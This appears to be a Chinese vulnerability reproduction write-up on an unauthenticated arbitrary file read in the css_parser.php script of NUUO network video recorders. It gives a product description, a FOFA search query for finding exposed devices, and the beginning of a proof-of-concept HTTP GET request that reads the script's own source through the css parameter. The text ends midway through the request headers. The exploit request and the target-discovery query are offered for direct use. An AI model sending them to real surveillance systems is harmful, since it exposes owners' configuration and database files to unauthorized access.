NUUO网络视频录像机 css_parser.php 任意文件读取漏洞复现

0x01 产品简介

NUUO网络视频录像机（Network Video Recorder，简称NVR）是NUUO Inc.生产的一种专业视频监控设备，它广泛应用于零售、交通、教育、政府和银行等多个领域。能够同时管理多个IP摄像头，实现视频录制、存储、回放及远程监控等功能。它采用先进的视频处理技术，提供高清、流畅的视频画面，满足各种复杂环境下的监控需求。

0x02 漏洞概述

NUUO网络视频录像机 css_parser.php 存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

0x03 复现环境

FOFA：

body="www.nuuo.com/eHelpdesk.php"

0x04 漏洞复现

PoC

GET /css_parser.php?css=css_parser.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv